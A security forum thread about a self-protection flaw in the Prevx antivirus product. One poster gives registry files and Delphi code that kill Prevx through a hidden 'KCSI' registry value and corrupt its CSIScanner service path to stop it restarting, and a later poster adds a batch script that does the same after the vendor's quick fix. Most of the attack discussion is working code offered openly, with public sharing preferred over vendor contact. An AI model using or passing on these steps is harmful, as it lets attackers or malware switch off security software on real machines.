[ssj100]

It's a marketing tactic haha. One reason why I don't have much respect for Prevx in general.

[STRELiTZIA]

Hi,

Prevx Registry value “KCSI” Exploit.

Prevx, trying to read the data contained in the registry value”\PCSI\KCSI”, and eventually make it null if it contains data different than zero.

Roots and keys:

Code: Select all

HKLM\SOFTWARE\PCSI\KCSI
 HKCU\Software\PCSI\KCSI
 HKU\.DEFAULT\Software\PCSI\KCSI

Code: Select all

Value         : KCSI
Data type     : REG_DWORD
Data value    : $00000001 

This value does not exist when you install Prevx, but he continually seeks it every time.

By changing the data stored in this value to “1”, Prevx was killed instantly, but Prevx processes resurrected.

To bypass resurrection, we can corrupt service or drivers keys values by synchronizing modification after the process is completed or using Loop to write "1" value every second.

Settings:
- Turn 'ON' Monitoring to get MAXIMUM Protection (this option prevents any Prevx registry keys malicious modification).


Use Windows registry file to add new values:

------ KillPrevxOneTime.reg --------

Code: Select all

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\PCSI]
"KCSI"=dword:00000001

--------- CorruptCSIScanner.reg ----------

Code: Select all

Windows Registry Editor Version 5.00

;Corrupt ImagePath to ""C:\Program Files\Prevx\prevx1.exe" /service";
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CSIScanner]
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,\
  6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,50,00,72,00,65,00,76,00,78,\
  00,5c,00,70,00,72,00,65,00,76,00,78,00,31,00,2e,00,65,00,78,00,65,00,22,00,\
  20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00

Launch” KillPrevxOneTime.reg” then “CorruptCSIScanner.reg”, you must synchronizing these operations.

Delphi part of code without optimization and checks:

Code: Select all

procedure KillPx();
var Reg: TRegistry;
begin
  Reg := TRegistry.Create;
  Reg.RootKey := HKEY_LOCAL_MACHINE;
  Reg.OpenKey('\SOFTWARE\PCSI', False);
  Reg.WriteInteger('KCSI', $00000001);

  Sleep(1500);

  Reg.OpenKey('\SYSTEM\CurrentControlSet\Services\CSIScanner', False);
  Reg.WriteExpandString('ImagePath', '"C:\Program Files\Prevx\prevx1.exe" /service');

  Reg.CloseKey;
  Reg.Free;
end;

Working application attached:
PxKiller.exe
KillPxOneTime.reg
CorruptCSIScanner.reg
Readme.txt


Regards.

[EP_X0FF]

LOL, product full of laughable beginner bugs.

[ssj100]

Nice, just tested it and Prevx is completely hosed haha. Since I know Prevx associates read this thread, may I respectfully suggest (once more) to think about implementing a HIPS component into your product.

[Triple Helix]

Fixed in 5 minutes! http://www.wilderssecurity.com/showpost ... ostcount=9

TH

[STRELiTZIA]

Fixed in 5 minutes! http://www.wilderssecurity.com/showpost ... ostcount=9

TH

Hello TH,
Happy for you :)
The bug is published to be fixed (this is not a personal attack against Prevx, it's just a subject for my studies)

But I noticed that the registry value remains active and still used to kill the process,
certainly it is a little better protected but still accessible and can be BYPASSED.

Regards.

[Triple Helix]

It would be nice to contact Prevx Directly instead of posting them here and at Wilders! IMO

TH

[STRELiTZIA]

Yes, it will be convenient for Prevx, but for now I prefer to share information in public ...
may be in the future, who knows :)

because study a real case like Prevx is very interesting.

[sparviero]

Hello TH,

Miserable, nothing has changed, continuing lies by Prevx. :mrgreen:
PxKiller.exe added to black-list how Medium Risk Malware, and here finsch.

Save this like *.bat file and run.

@echo off
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 1 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t
REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx1.exe" /service" /f

Prevx is completely hosed ! (nothing alert-Medium Risk Malware) lol
If you like continue play with this miserable coded software,

Save this like *:*.bat file and run.

@echo off
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 0 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t
REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx.exe" /service" /f

Prevx returns to normal, and you can expect to be protected! :lol:

[EP_X0FF]

While running for self-protection recovery Prevx created perfect BSOD generation software in build 209.

INVALID_KERNEL_HANDLE blue screen of death by just few clicks :)